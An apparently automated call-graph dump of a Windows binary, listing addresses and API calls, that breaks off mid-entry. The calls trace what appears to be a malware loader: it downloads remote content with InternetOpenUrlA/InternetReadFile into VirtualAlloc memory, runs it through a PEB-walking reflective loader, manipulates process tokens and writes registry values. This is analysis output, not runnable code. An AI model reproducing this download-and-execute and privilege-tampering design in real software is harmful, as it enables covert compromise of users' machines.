__CxxThrowException@8 41917->41945 41921 54dcc2 41922 54dcc8 41921->41922 41923 54dcdb std::locale::_Init 41921->41923 41947 54da33 76 API calls 3 library calls 41922->41947 41923->41901 41925->41901 41927 54d9bd InitializeCriticalSection 41926->41927 41928 54d9b8 41926->41928 41927->41917 41948 538190 LocalAlloc RaiseException __EH_prolog3 std::locale::_Init __CxxThrowException@8 41928->41948 41932 54d897 41930->41932 41931 54d956 _memset 41933 54d96d LeaveCriticalSection 41931->41933 41932->41931 41934 54d8e5 GlobalHandle GlobalUnlock 41932->41934 41935 54d8d0 41932->41935 41933->41917 41937 53751a 69 API calls 41934->41937 41949 53751a 41935->41949 41939 54d903 GlobalReAlloc 41937->41939 41940 54d90f 41939->41940 41941 54d936 GlobalLock 41940->41941 41942 54d928 LeaveCriticalSection 41940->41942 41943 54d91a GlobalHandle GlobalLock 41940->41943 41941->41931 41953 538190 LocalAlloc RaiseException __EH_prolog3 std::locale::_Init __CxxThrowException@8 41942->41953 41943->41942 41945->41917 41946->41921 41947->41923 41948->41927 41950 53752f 41949->41950 41951 53753c GlobalAlloc 41950->41951 41954 40e4a0 69 API calls 41950->41954 41951->41940 41953->41941 41954->41951 41955 53a5f7 41956 53a600 41955->41956 41957 53a5fd 41955->41957 41960 53a5cb 41956->41960 41961 53a5d8 41960->41961 41962 53a5ee DeleteObject 41960->41962 41966 53a515 99 API calls 2 library calls 41961->41966 41964 53a5df 41964->41962 41967 551304 66 API calls 41964->41967 41966->41964 41967->41962 41968 63a2d7 41969 63a354 41968->41969 41982 63a2e5 41968->41982 41991 649740 DecodePointer 41969->41991 41971 63a35a 41992 63cd63 65 API calls __getptd_noexit 41971->41992 41972 63a2f0 41972->41982 41985 645329 65 API calls 2 library calls 41972->41985 41986 64517a 65 API calls 7 library calls 41972->41986 41987 63b587 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 41972->41987 41975 63a313 RtlAllocateHeap 41977 63a34c 41975->41977 41975->41982 41978 63a340 41989 63cd63 65 API calls __getptd_noexit 41978->41989 41982->41972 41982->41975 41982->41978 41983 63a33e 41982->41983 41988 649740 DecodePointer 41982->41988 41990 63cd63 65 API calls __getptd_noexit 41983->41990 41985->41972 41986->41972 41988->41982 41989->41983 41990->41977 41991->41971 41992->41977 41993 409b4c 42018 40e1b0 41993->42018 41998 40e080 102 API calls 41999 409b89 41998->41999 42000 40e080 102 API calls 41999->42000 42001 409b9d 42000->42001 42035 406f50 103 API calls __crtGetStringTypeA_stat 42001->42035 42003 409ba8 42036 40dbb0 69 API calls 42003->42036 42005 409bb8 42010 409ca5 42005->42010 42037 427ff0 42005->42037 42009 409c00 42055 40dc20 69 API calls 2 library calls 42009->42055 42013 409c53 42010->42013 42012 409c1c CreateFileW 42012->42013 42014 409c3a CloseHandle 42012->42014 42013->42010 42057 6388f0 5 API calls __call_reportfault 42013->42057 42056 40dd20 69 API calls _memcpy_s 42014->42056 42017 409dbd 42019 40e1cb 42018->42019 42020 40e1e4 42019->42020 42058 40e240 69 API calls 42019->42058 42059 63a6f1 65 API calls 3 library calls 42020->42059 42023 409b66 42024 40e080 42023->42024 42025 40e0af 42024->42025 42026 40e0c4 42025->42026 42070 40e4a0 69 API calls 42025->42070 42028 40e0e8 42026->42028 42031 40e100 42026->42031 42071 5382f3 98 API calls 42028->42071 42031->42031 42060 40e360 42031->42060 42032 409b75 42032->41998 42033 40e0f1 42033->42032 42072 40ded0 73 API calls _wmemcpy_s 42033->42072 42035->42003 42036->42005 42038 428049 _memset 42037->42038 42040 428066 42038->42040 42093 40e4a0 69 API calls 42038->42093 42041 42809c GetModuleFileNameW 42040->42041 42094 40e4a0 69 API calls 42040->42094 42044 4280d0 42041->42044 42044->42044 42045 40e360 69 API calls 42044->42045 42046 4280f2 _wcsrchr 42045->42046 42085 419560 42046->42085 42048 428124 42095 40dbb0 69 API calls 42048->42095 42050 428130 42096 6388f0 5 API calls __call_reportfault 42050->42096 42053 409bf0 42054 40dd20 69 API calls _memcpy_s 42053->42054 42054->42009 42055->42012 42056->42013 42057->42017 42058->42020 42059->42023 42061 40e372 42060->42061 42062 40e37f 42060->42062 42081 40e140 69 API calls 42061->42081 42064 40e4a0 69 API calls 42062->42064 42069 40e3fa 42062->42069 42073 40e290 42062->42073 42082 63acd4 65 API calls 2 library calls 42062->42082 42083 63a6f1 65 API calls 3 library calls 42062->42083 42064->42062 42065 40e377 42065->42032 42069->42032 42070->42026 42071->42033 42072->42032 42074 40e2a0 42073->42074 42075 40e2a8 42074->42075 42079 40e2b3 42074->42079 42077 40e1b0 69 API calls 42075->42077 42076 40e2e0 42076->42062 42078 40e2ae 42077->42078 42078->42062 42079->42076 42084 40e250 69 API calls 42079->42084 42081->42065 42082->42062 42083->42062 42084->42076 42086 419576 42085->42086 42087 41957f 42086->42087 42090 41959b 42086->42090 42112 40dd20 69 API calls _memcpy_s 42087->42112 42089 419588 42089->42048 42097 420710 42090->42097 42093->42040 42094->42041 42095->42050 42096->42053 42099 4207f2 42097->42099 42098 4209d5 ShellExecuteA 42100 4209fe 42098->42100 42099->42098 42101 420a17 CreateThread 42100->42101 42103 420a50 42101->42103 42102 4195ca 42102->42048 42103->42102 42104 420b6f VirtualAlloc 42103->42104 42105 420ba2 42104->42105 42106 420d2e VirtualAlloc 42105->42106 42107 420d66 InternetOpenA InternetOpenUrlA 42106->42107 42108 420daf 42107->42108 42108->42107 42109 420dc6 InternetReadFile 42108->42109 42110 420e03 42108->42110 42109->42108 42111 420e2c CreateThread 42110->42111 42111->42102 42113 3640000 42111->42113 42112->42089 42115 3640005 42113->42115 42118 3640031 42115->42118 42130 3640b11 GetPEB 42118->42130 42121 3640b11 GetPEB 42123 36402a6 42121->42123 42122 364002c 42123->42122 42124 364049a GetNativeSystemInfo 42123->42124 42124->42122 42125 36404c7 VirtualAlloc 42124->42125 42127 36404e0 42125->42127 42132 1000c504 42127->42132 42131 364029a 42130->42131 42131->42121 42133 1000c514 42132->42133 42134 1000c50f 42132->42134 42245 1000c40e 42133->42245 42253 100108ac GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 42134->42253 42137 3640a47 42137->42122 42138 100039a3 42137->42138 42139 100039c2 _memset __write_nolock 42138->42139 42140 10003b5b Sleep 42139->42140 42141 10003c9a _memset 42140->42141 42142 10003cb4 Sleep 42141->42142 42143 10003deb _memset 42142->42143 42333 1000b9db GetSystemTimeAsFileTime 42143->42333 42145 10003e0b 42335 1000b8ac 42145->42335 42147 10003e12 _memset 42338 1000b8be 42147->42338 42149 10003e36 42150 10003e72 _memset 42149->42150 42151 1000b8be _rand 38 API calls 42149->42151 42152 10003ece wsprintfA 42150->42152 42151->42149 42153 10003f0a _memset 42152->42153 42154 10003f34 Sleep 42153->42154 42341 1000cce0 42154->42341 42156 10003f4e wsprintfA 42157 10003f73 _memset 42156->42157 42158 10003fba wsprintfA 42157->42158 42159 10003ffb _memset 42158->42159 42160 10004013 Sleep 42159->42160 42161 1000cce0 _memset 42160->42161 42162 1000404c wsprintfA 42161->42162 42163 10004084 _memset 42162->42163 42164 1000409c Sleep 42163->42164 42165 1000cce0 _memset 42164->42165 42166 100040d0 wsprintfA 42165->42166 42167 10004108 _memset 42166->42167 42343 100028b9 42167->42343 42170 10004178 42171 100028b9 49 API calls 42170->42171 42172 100041a0 Sleep 42171->42172 42172->42170 42173 100041b5 42172->42173 42174 100028b9 49 API calls 42173->42174 42175 100041dd Sleep 42174->42175 42175->42173 42176 100041f2 42175->42176 42177 1000b9db __time64 GetSystemTimeAsFileTime 42176->42177 42178 100041f8 42177->42178 42179 1000b8ac 38 API calls 42178->42179 42180 100041ff _memset 42179->42180 42181 1000b8be _rand 38 API calls 42180->42181 42182 10004239 _memset 42180->42182 42181->42180 42353 100059cb 42182->42353 42184 100042f9 42360 100059a5 42184->42360 42187 100059cb 45 API calls 42188 1000432e 42187->42188 42189 100059cb 45 API calls 42188->42189 42190 10004349 42189->42190 42191 100059cb 45 API calls 42190->42191 42192 10004369 42191->42192 42193 100059cb 45 API calls 42192->42193 42194 10004389 42193->42194 42363 1000a063 42194->42363 42196 1000439d 42395 10002e6f CreateFileA GetFileSize 42196->42395 42198 100043ba Sleep Sleep 42199 100043ee _memset 42198->42199 42403 1000afbd 42199->42403 42201 1000440b _memset 42407 1000b91d 42201->42407 42204 1000448d 42416 100018ea 42204->42416 42207 10004497 42598 10002388 64 API calls 3 library calls 42207->42598 42208 10004699 GlobalAddAtomA 42217 100046c0 42208->42217 42210 100044a4 Sleep 42210->42208 42211 100044b6 42211->42208 42599 1000356a 7 API calls 42211->42599 42213 10004630 42214 10004641 Sleep 42213->42214 42215 1000465b 42213->42215 42600 1000356a 7 API calls 42214->42600 42601 100036ed CLRCreateInstance SafeArrayAccessData SafeArrayUnaccessData SysAllocString __EH_prolog3 42215->42601 42220 10004c13 Sleep 42217->42220 42218 10004658 42218->42215 42577 100031c7 42220->42577 42221 10004685 42221->42208 42602 10001144 76 API calls 4 library calls 42221->42602 42225 10004698 42225->42208 42226 10004c2d 42595 1000bcaf 42226->42595 42228 10004c33 RegOpenKeyExA 42235 10004b3b _memset 42228->42235 42229 10004705 _memset 42229->42229 42237 1000afbd _mbstowcs 42 API calls 42229->42237 42230 10004c97 Sleep 42230->42235 42231 10004c63 RegSetValueExA RegCloseKey 42231->42235 42233 10004b6b LoadLibraryA 42233->42235 42234 10004bbc GetProcAddress 42234->42220 42234->42235 42235->42230 42235->42231 42235->42233 42235->42234 42236 10004bf9 ShellExecuteA 42235->42236 42604 10002388 64 API calls 3 library calls 42235->42604 42236->42220 42238 100049a9 _memset 42237->42238 42239 1000b91d _strcat_s 38 API calls 42238->42239 42240 10004aa8 FindWindowExA 42239->42240 42240->42228 42241 10004ac5 42240->42241 42603 10001030 8 API calls 2 library calls 42241->42603 42243 10004ae0 Sleep 42244 10004af7 42243->42244 42244->42235 42246 1000c41a __setmbcp 42245->42246 42247 1000c4b7 __setmbcp 42246->42247 42251 1000c467 ___DllMainCRTStartup 42246->42251 42254 1000c2aa 42246->42254 42247->42137 42249 1000c497 42249->42247 42250 1000c2aa __CRT_INIT@12 83 API calls 42249->42250 42250->42247 42251->42247 42251->42249 42252 1000c2aa __CRT_INIT@12 83 API calls 42251->42252 42252->42249 42253->42133 42255 1000c2b6 __setmbcp 42254->42255 42256 1000c338 42255->42256 42257 1000c2be 42255->42257 42259 1000c399 42256->42259 42260 1000c33e 42256->42260 42306 1000ef88 HeapCreate 42257->42306 42261 1000c3f7 42259->42261 42262 1000c39e 42259->42262 42266 1000c35c 42260->42266 42273 1000c2c7 __setmbcp 42260->42273 42316 1000bcdb 38 API calls _doexit 42260->42316 42261->42273 42332 1000eb52 41 API calls __freefls@4 42261->42332 42321 1000e86b TlsGetValue 42262->42321 42263 1000c2c3 42265 1000c2ce 42263->42265 42263->42273 42307 1000ebc0 45 API calls 5 library calls 42265->42307 42271 1000c370 42266->42271 42317 10010327 39 API calls _free 42266->42317 42320 1000c383 40 API calls __mtterm 42271->42320 42273->42251 42275 1000c2d3 __RTC_Initialize 42278 1000c2d7 42275->42278 42284 1000c2e3 GetCommandLineA 42275->42284 42277 1000c3af 42277->42273 42281 1000c3bb RtlDecodePointer 42277->42281 42308 1000efa6 HeapDestroy 42278->42308 42279 1000c366 42318 1000e89f 40 API calls _free 42279->42318 42288 1000c3d0 42281->42288 42283 1000c36b 42319 1000efa6 HeapDestroy 42283->42319 42309 100106ab 41 API calls 2 library calls 42284->42309 42285 1000c2dc 42285->42273 42290 1000c3d4 42288->42290 42291 1000c3eb 42288->42291 42289 1000c2f3 42310 100100e2 45 API calls __calloc_crt 42289->42310 42325 1000e8dc 38 API calls 4 library calls 42290->42325 42326 1000b491 42291->42326 42295 1000c3db GetCurrentThreadId 42295->42273 42296 1000c2fd 42297 1000c301 42296->42297 42312 100105f0 50 API calls 3 library calls 42296->42312 42311 1000e89f 40 API calls _free 42297->42311 42300 1000c30d 42305 1000c321 42300->42305 42313 1001037a 49 API calls 6 library calls 42300->42313 42303 1000c316 42303->42305 42314 1000bad8 45 API calls 4 library calls 42303->42314 42305->42285 42315 10010327 39 API calls _free 42305->42315 42306->42263 42307->42275 42308->42285 42309->42289 42310->42296 42311->42278 42312->42300 42313->42303 42314->42305 42315->42297 42316->42266 42317->42279 42318->42283 42319->42271 42320->42273 42322 1000e880 RtlDecodePointer TlsSetValue 42321->42322 42323 1000c3a3 42321->42323 42322->42323 42324 10010048 38 API calls _calloc 42323->42324 42324->42277 42325->42295 42327 1000b4c5 __dosmaperr 42326->42327 42328 1000b49c RtlFreeHeap 42326->42328 42327->42285 42328->42327 42329 1000b4b1 42328->42329 42330 1000ddf3 __cftoa_l 36 API calls 42329->42330 42331 1000b4b7 GetLastError 42330->42331 42331->42327 42332->42273 42334 1000ba0b __aulldiv 42333->42334 42334->42145 42605 1000ea09 42335->42605 42339 1000ea09 __getptd 38 API calls 42338->42339 42340 1000b8c3 42339->42340 42340->42149 42342 1000ccec 42341->42342 42342->42156 42342->42342 42344 100028c6 _memset __write_nolock 42343->42344 42345 10002a3f 42344->42345 42626 1000aa9e 42344->42626 42638 1000ad41 42345->42638 42347 10002d0a Sleep 42347->42167 42347->42170 42349 10002b0c _memset 42349->42345 42350 10002c8d CreateFileA WriteFile FlushFileBuffers CloseHandle 42349->42350 42351 1000aa9e 45 API calls 42349->42351 42350->42345 42352 10002ba5 _memset 42351->42352 42352->42345 42352->42350 42354 100059e3 42353->42354 42355 10005a13 42354->42355 42356 100059fa 42354->42356 42679 10005bdb 45 API calls std::_Xinvalid_argument 42355->42679 42668 10005a6c 42356->42668 42359 10005a11 42359->42184 42361 10005a6c 45 API calls 42360->42361 42362 10004313 42361->42362 42362->42187 42364 1000a072 __EH_prolog3_GS 42363->42364 42684 1000a49f 42364->42684 42366 1000a0b1 42691 1000961c 42366->42691 42368 1000a0d1 42369 1000a10d 42368->42369 42370 1000a0df wsprintfA 42368->42370 42372 1000a124 42369->42372 42713 10008b91 42369->42713 42374 1000a42c OutputDebugStringA 42370->42374 42377 1000a400 42372->42377 42378 1000a142 42372->42378 42390 1000a44c 42374->42390 42756 10009f6b 47 API calls 42377->42756 42701 1000972f 42378->42701 42382 1000a148 wsprintfA 42382->42374 42385 100096c5 51 API calls 42393 1000a16f 42385->42393 42387 1000a3f6 42755 1000aa30 39 API calls 2 library calls 42387->42755 42388 100059cb 45 API calls 42388->42393 42390->42196 42391 1000a520 45 API calls 42391->42393 42393->42372 42393->42385 42393->42387 42393->42388 42393->42391 42720 1000b7e4 42393->42720 42737 10009fac 42393->42737 42742 1000a59a 42393->42742 42751 10009700 42393->42751 42396 1000aa9e 45 API calls 42395->42396 42397 10002ea4 ReadFile 42396->42397 42398 10002ec1 42397->42398 42399 1000aa9e 45 API calls 42398->42399 42400 10002ede 42399->42400 42903 10002d0c CreateFileA 42400->42903 42402 10002f02 42402->42198 42404 1000afcb 42403->42404 42919 1000ae5b 42404->42919 42406 1000afe2 42406->42201 42408 1000b932 42407->42408 42409 1000b92b 42407->42409 42410 1000ddf3 __cftoa_l 38 API calls 42408->42410 42409->42408 42413 1000b960 42409->42413 42415 1000b937 42410->42415 42412 10004470 FindWindowExA 42412->42204 42412->42229 42413->42412 42414 1000ddf3 __cftoa_l 38 API calls 42413->42414 42414->42415 42949 1000dda1 11 API calls __cftoa_l 42415->42949 42950 10001772 GetCurrentProcess OpenProcessToken 42416->42950 42421 10001926 OpenProcess 42422 1000191e 42421->42422 42423 1000193b OpenProcessToken 42421->42423 42424 100017fe 10 API calls 42422->42424 42425 10001951 CloseHandle 42423->42425 42426 1000195c AdjustTokenPrivileges 42423->42426 42427 10001bbd 42424->42427 42425->42422 42431 100019a0 42426->42431 42556 10001994 42426->42556 42429 10001bc6 OpenProcess 42427->42429 42430 10001e4b 42427->42430 42429->42430 42433 10001bdf OpenProcessToken 42429->42433 42432 100017fe 10 API calls 42430->42432 42442 100019be 42431->42442 42968 100018a0 6 API calls __cftof_l 42431->42968 42436 10001e55 42432->42436 42434 10001c03 AdjustTokenPrivileges 42433->42434 42435 10001bf5 CloseHandle 42433->42435 42434->42430 42446 10001c3f 42434->42446 42435->42430 42437 100020e3 42436->42437 42438 10001e5e OpenProcess 42436->42438 42439 100017fe 10 API calls 42437->42439 42438->42437 42440 10001e77 OpenProcessToken 42438->42440 42443 100020ed 42439->42443 42444 10001e9b AdjustTokenPrivileges 42440->42444 42445 10001e8d CloseHandle 42440->42445 42453 100019dd 42442->42453 42969 100018a0 6 API calls __cftof_l 42442->42969 42448 10002376 42443->42448 42449 100020f6 OpenProcess 42443->42449 42444->42437 42457 10001ed7 42444->42457 42445->42437 42458 10001c5d 42446->42458 42982 100018a0 6 API calls __cftof_l 42446->42982 42450 1000ad41 __cftof_l 5 API calls 42448->42450 42449->42448 42451 1000210f OpenProcessToken 42449->42451 42454 10002386 42450->42454 42455 10002133 AdjustTokenPrivileges 42451->42455 42456 10002125 CloseHandle 42451->42456 42461 100019fc 42453->42461 42970 100018a0 6 API calls __cftof_l 42453->42970 42454->42207 42454->42211 42455->42448 42464 1000216f 42455->42464 42456->42448 42465 10001ef5 42457->42465 42996 100018a0 6 API calls __cftof_l 42457->42996 42466 10001c7c 42458->42466 42983 100018a0 6 API calls __cftof_l 42458->42983 42469 10001a1b 42461->42469 42971 100018a0 6 API calls __cftof_l 42461->42971 42472 1000218d 42464->42472 43010 100018a0 6 API calls __cftof_l 42464->43010 42473 10001f14 42465->42473 42997 100018a0 6 API calls __cftof_l 42465->42997 42470 10001c9b 42466->42470 42984 100018a0 6 API calls __cftof_l 42466->42984 42477 10001a3a 42469->42477 42972 100018a0 6 API calls __cftof_l 42469->42972 42480 10001cba 42470->42480 42985 100018a0 6 API calls __cftof_l 42470->42985 42478 100021ac 42472->42478 43011 100018a0 6 API calls __cftof_l 42472->43011 42479 10001f33 42473->42479 42998 100018a0 6 API calls __cftof_l 42473->42998 42485 10001a59 42477->42485 42973 100018a0 6 API calls __cftof_l 42477->42973 42487 100021cb 42478->42487 43012 100018a0 6 API calls __cftof_l 42478->43012 42488 10001f52 42479->42488 42999 100018a0 6 API calls __cftof_l 42479->42999 42489 10001cd9 42480->42489 42986 100018a0 6 API calls __cftof_l 42480->42986 42493 10001a78 42485->42493 42974 100018a0 6 API calls __cftof_l 42485->42974 42497 100021ea 42487->42497 43013 100018a0 6 API calls __cftof_l 42487->43013 42494 10001f71 42488->42494 43000 100018a0 6 API calls __cftof_l 42488->43000 42495 10001cf8 42489->42495 42987 100018a0 6 API calls __cftof_l 42489->42987 42501 10001a97 42493->42501 42975 100018a0 6 API calls __cftof_l 42493->42975 42504 10001f90 42494->42504 43001 100018a0 6 API calls __cftof_l 42494->43001 42505 10001d17 42495->42505 42988 100018a0 6 API calls __cftof_l 42495->42988 42503 10002209 42497->42503 43014 100018a0 6 API calls __cftof_l 42497->43014 42509 10001ab6 42501->42509 42976 100018a0 6 API calls __cftof_l 42501->42976 42512 10002228 42503->42512 43015 100018a0 6 API calls __cftof_l 42503->43015 42513 10001faf 42504->42513 43002 100018a0 6 API calls __cftof_l 42504->43002 42510 10001d36 42505->42510 42989 100018a0 6 API calls __cftof_l 42505->42989 42517 10001ad5 42509->42517 42977 100018a0 6 API calls __cftof_l 42509->42977 42519 10001d55 42510->42519 42990 100018a0 6 API calls __cftof_l 42510->42990 42521 10002247 42512->42521 43016 100018a0 6 API calls __cftof_l 42512->43016 42518 10001fce 42513->42518 43003 100018a0 6 API calls __cftof_l 42513->43003 42525 10001af4 42517->42525 42978 100018a0 6 API calls __cftof_l 42517->42978 42528 10001fed 42518->42528 43004 100018a0 6 API calls __cftof_l 42518->43004 42529 10001d74 42519->42529 42991 100018a0 6 API calls __cftof_l 42519->42991 42527 10002266 42521->42527 43017 100018a0 6 API calls __cftof_l 42521->43017 42533 10001b13 42525->42533 42979 100018a0 6 API calls __cftof_l 42525->42979 42536 10002285 42527->42536 43018 100018a0 6 API calls __cftof_l 42527->43018 42537 1000200c 42528->42537 43005 100018a0 6 API calls __cftof_l 42528->43005 42534 10001d93 42529->42534 42992 100018a0 6 API calls __cftof_l 42529->42992 42541 10001b32 42533->42541 42980 100018a0 6 API calls __cftof_l 42533->42980 42544 10001db2 42534->42544 42993 100018a0 6 API calls __cftof_l 42534->42993 42542 100022a4 42536->42542 43019 100018a0 6 API calls __cftof_l 42536->43019 42543 1000202b 42537->42543 43006 100018a0 6 API calls __cftof_l 42537->43006 42549 10001b52 GetLengthSid SetTokenInformation 42541->42549 42981 100018a0 6 API calls __cftof_l 42541->42981 42551 100022c3 42542->42551 43020 100018a0 6 API calls __cftof_l 42542->43020 42552 1000204a 42543->42552 43007 100018a0 6 API calls __cftof_l 42543->43007 42553 10001dd1 42544->42553 42994 100018a0 6 API calls __cftof_l 42544->42994 42549->42556 42561 100022e2 42551->42561 43021 100018a0 6 API calls __cftof_l 42551->43021 42559 10002069 42552->42559 43008 100018a0 6 API calls __cftof_l 42552->43008 42560 10001df1 GetLengthSid SetTokenInformation 42553->42560 42995 100018a0 6 API calls __cftof_l 42553->42995 42555 10001b51 42555->42549 42556->42422 42568 10002089 GetLengthSid SetTokenInformation 42559->42568 43009 100018a0 6 API calls __cftof_l 42559->43009 42566 10001e41 42560->42566 42567 10002301 42561->42567 43022 100018a0 6 API calls __cftof_l 42561->43022 42565 10001df0 42565->42560 42566->42430 42573 10002321 GetLengthSid SetTokenInformation 42567->42573 43023 100018a0 6 API calls __cftof_l 42567->43023 42572 100020d9 42568->42572 42571 10002088 42571->42568 42572->42437 42576 10002371 42573->42576 42575 10002320 42575->42573 42576->42448 43024 10010ab0 42577->43024 42580 10003249 42581 1000ad41 __cftof_l 5 API calls 42580->42581 42582 10003568 Sleep 42581->42582 42582->42226 42584 10003202 _strrchr 42584->42580 42584->42584 43026 10002fdd 6 API calls 3 library calls 42584->43026 42585 1000326b _memset _strncpy 42585->42580 42587 100032f5 _memset 42585->42587 42587->42585 42588 1000ad50 63 API calls _sprintf 42587->42588 42589 10003472 _memset 42587->42589 43027 10002f16 7 API calls __cftof_l 42587->43027 42588->42587 42590 100034a2 LoadLibraryA 42589->42590 42591 1000cce0 _memset 42590->42591 42592 100034f1 GetProcAddress 42591->42592 42593 1000350d _memset 42592->42593 42593->42580 42594 1000354f FreeLibrary 42593->42594 42594->42580 43028 1000bb6f 42595->43028 42597 1000bcc0 42597->42228 42598->42210 42599->42213 42600->42218 42601->42221 42602->42225 42603->42243 42604->42235 42610 1000e990 GetLastError 42605->42610 42607 1000ea11 42608 1000b8b6 42607->42608 42625 1000bcea 38 API calls 3 library calls 42607->42625 42608->42147 42611 1000e86b ___set_flsgetvalue TlsGetValue RtlDecodePointer TlsSetValue 42610->42611 42612 1000e9a7 42611->42612 42613 1000e9fd SetLastError 42612->42613 42614 1000e9af 42612->42614 42613->42607 42615 10010048 __calloc_crt 34 API calls 42614->42615 42616 1000e9bb 42615->42616 42616->42613 42617 1000e9c3 RtlDecodePointer 42616->42617 42618 1000e9d8 42617->42618 42619 1000e9f4 42618->42619 42620 1000e9dc 42618->42620 42622 1000b491 _free 34 API calls 42619->42622 42621 1000e8dc __getptd_noexit 34 API calls 42620->42621 42623 1000e9e4 GetCurrentThreadId 42621->42623 42624 1000e9fa 42622->42624 42623->42613 42624->42613 42628 1000bd08 42626->42628 42629 1000bd2c 42628->42629 42634 1000bd2e std::exception::exception 42628->42634 42646 1000b4cb 42628->42646 42663 1000f1d7 RtlDecodePointer 42628->42663 42629->42349 42631 1000bd6c 42665 1000b0fd 38 API calls std::exception::operator= 42631->42665 42633 1000bd76 42666 1000c527 RaiseException 42633->42666 42634->42631 42664 1000cc43 44 API calls __cinit 42634->42664 42637 1000bd87 42639 1000ad49 42638->42639 42640 1000ad4b IsDebuggerPresent 42638->42640 42639->42347 42667 100123ee 42640->42667 42643 1000ce27 SetUnhandledExceptionFilter UnhandledExceptionFilter 42644 1000ce44 __call_reportfault 42643->42644 42645 1000ce4c GetCurrentProcess TerminateProcess 42643->42645 42644->42645 42645->42347 42647 1000b548 42646->42647 42654 1000b4d9 42646->42654 42648 1000f1d7 _malloc RtlDecodePointer 42647->42648 42649 1000b54e 42648->42649 42651 1000ddf3 __cftoa_l 37 API calls 42649->42651 42650 1000f18f __FF_MSGBANNER 37 API calls 42655 1000b4e4 42650->42655 42662 1000b540 42651->42662 42652 1000b507 RtlAllocateHeap 42652->42654 42652->42662 42653 1000efe0 __NMSG_WRITE 37 API calls 42653->42655 42654->42652 42654->42655 42656 1000b534 42654->42656 42659 1000f1d7 _malloc RtlDecodePointer 42654->42659 42660 1000b532 42654->42660 42655->42650 42655->42653 42655->42654 42658 1000ba57 _malloc GetModuleHandleW GetProcAddress ExitProcess 42655->42658 42657 1000ddf3 __cftoa_l 37 API calls 42656->42657 42657->42660 42658->42655 42659->42654 42661 1000ddf3 __cftoa_l 37 API calls 42660->42661 42661->42662 42662->42628 42663->42628 42664->42631 42665->42633 42666->42637 42667->42643 42669 10005a87 42668->42669 42670 10005a7d 42668->42670 42672 10005a97 42669->42672 42673 10005aaf 42669->42673 42680 1000aa30 39 API calls 2 library calls 42670->42680 42681 10005b71 39 API calls 2 library calls 42672->42681 42683 10005bdb 45 API calls std::_Xinvalid_argument 42673->42683 42676 10005aa3 42682 10005b71 39 API calls 2 library calls 42676->42682 42678 10005aad 42678->42359 42679->42359 42680->42669 42681->42676 42682->42678 42683->42678 42685 1000a4b8 42684->42685 42686 1000a4ae 42684->42686 42758 1000a6f2 45 API calls 2 library calls 42685->42758 42757 10005b71 39 API calls 2 library calls 42686->42757 42689 1000a4b6 42689->42366 42690 1000a4c5 42690->42366 42692 10009628 __EH_prolog3 42691->42692 42759 1000bd08 42692->42759 42697 10009648 42771 10008b0f 42697->42771 42699 1000bd08 45 API calls 42700 10009663 42699->42700 42700->42368 42702 10009746 42701->42702 42707 1000973a 42701->42707 42703 10009764 42702->42703 42702->42707 42780 10008a54 42702->42780 42705 10009774 42703->42705 42706 10009779 42703->42706 42703->42707 42708 10008a54 38 API calls 42705->42708 42788 10007df6 CloseHandle 42706->42788 42707->42382 42708->42706 42710 10009780 42711 1000b491 _free 38 API calls 42710->42711 42712 10009786 42711->42712 42712->42707 42789 1000be5b 42713->42789 42716 100096c5 42717 100096e1 42716->42717 42718 100096da 42716->42718 42717->42718 42792 10008bda 42717->42792 42718->42393 42721 1000b7f0 __setmbcp 42720->42721 42722 1000b813 __stbuf 42721->42722 42723 1000b7fe 42721->42723 42818 1000f317 42722->42818 42848 1000ddf3 42723->42848 42728 1000b825 __stbuf 42823 1000f3b4 42728->42823 42729 1000b80e __setmbcp 42729->42393 42731 1000b837 __stbuf 42830 1000d06b 42731->42830 42733 1000b84f __stbuf 42852 1000f450 61 API calls __flush 42733->42852 42735 1000b860 42853 1000b878 RtlLeaveCriticalSection RtlLeaveCriticalSection __stbuf _wprintf 42735->42853 42740 10009fb8 __EH_prolog3_GS 42737->42740 42739 1000a05b 42739->42393 42740->42739 42741 1000a64a 45 API calls 42740->42741 42854 1000c1ed 42740->42854 42741->42740 42743 1000a5a6 __EH_prolog3 42742->42743 42744 1000a5db 42743->42744 42745 1000a5b5 42743->42745 42746 1000a5cd 42744->42746 42860 1000a69b 45 API calls std::_Xinvalid_argument 42744->42860 42745->42746 42859 1000a69b 45 API calls std::_Xinvalid_argument 42745->42859 42748 1000a5fb 42746->42748 42750 100059a5 45 API calls 42746->42750 42748->42393 42750->42748 42752 10009707 42751->42752 42753 1000970e 42751->42753 42752->42393 42753->42752 42861 100092bd 42753->42861 42755->42377 42756->42382 42757->42689 42758->42690 42761 1000bd12 42759->42761 42760 1000b4cb _malloc 38 API calls 42760->42761 42761->42760 42762 10009632 42761->42762 42763 1000f1d7 _malloc RtlDecodePointer 42761->42763 42767 1000bd2e std::exception::exception 42761->42767 42762->42697 42779 10008aba 45 API calls 42762->42779 42763->42761 42764 1000bd6c 42765 1000b0fd std::exception::exception 38 API calls 42764->42765 42766 1000bd76 42765->42766 42768 1000c527 __CxxThrowException@8 RaiseException 42766->42768 42767->42764 42769 1000cc43 __cinit 44 API calls 42767->42769 42770 1000bd87 42768->42770 42769->42764 42772 10008b18 42771->42772 42777 10008b69 42771->42777 42773 10008b1e GetCurrentDirectoryA 42772->42773 42772->42777 42774 10008b35 42773->42774 42775 10007d6b 48 API calls 42774->42775 42776 10008b63 42775->42776 42776->42777 42778 100080e7 42 API calls 42776->42778 42777->42699 42777->42700 42778->42777 42779->42697 42781 10008a62 42780->42781 42783 10008a67 42780->42783 42781->42703 42782 10008a94 42785 10008aa6 42782->42785 42786 1000790e 38 API calls 42782->42786 42783->42781 42783->42782 42784 1000b491 _free 38 API calls 42783->42784 42784->42782 42787 1000b491 _free 38 API calls 42785->42787 42786->42785 42787->42781 42788->42710 42790 1000bd88 __mbsnbcpy_l 40 API calls 42789->42790 42791 10008ba9 42790->42791 42791->42372 42791->42716 42793 10008c0c 42792->42793 42797 10008c31 42792->42797 42796 10008a54 38 API calls 42793->42796 42793->42797 42799 10008c22 42793->42799 42794 1000ad41 __cftof_l 5 API calls 42795 1000916b 42794->42795 42795->42718 42796->42799 42797->42794 42798 10008c9d 42801 10008cca 42798->42801 42802 100084bc SetFilePointer ReadFile 42798->42802 42799->42797 42799->42798 42800 10008487 SetFilePointer ReadFile 42799->42800 42800->42798 42803 10008264 SetFilePointer ReadFile 42801->42803 42802->42798 42804 10008ce6 42803->42804 42805 1000850d SetFilePointer ReadFile 42804->42805 42806 10008d05 42805->42806 42806->42797 42807 10007e17 SetFilePointer 42806->42807 42808 10008d27 42807->42808 42808->42797 42809 